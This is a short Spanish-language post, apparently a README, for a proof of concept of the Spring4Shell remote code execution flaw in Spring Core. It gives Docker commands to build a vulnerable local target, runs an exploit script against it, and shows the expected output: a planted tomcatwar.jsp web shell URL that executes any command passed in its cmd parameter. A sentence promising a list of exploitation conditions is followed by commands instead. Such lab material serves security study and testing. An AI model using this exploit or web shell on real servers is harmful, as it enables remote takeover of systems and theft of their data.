
Otro POC de spring4shell (Spring core RCE)
Esta vulnerabilidad afecta a Spring Core y permite a un atacante enviar una solicitud HTTP especialmente manipulada para evadir las protecciones del analizador de solicitudes HTTP de la biblioteca, lo que conduce a la ejecución remota de código.
Más información aquí

Para que esta vulnerabilidad pueda ser explotada, deben cumplirse varias condiciones:
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
La respuesta esperada
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
Si accedes a esta URL, ejecutará cualquier comando que quieras cmd=<whatyouwant>

Si te conectas por SSH al contenedor, verás que se ha creado un nuevo archivo tomcatwar.jsp
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT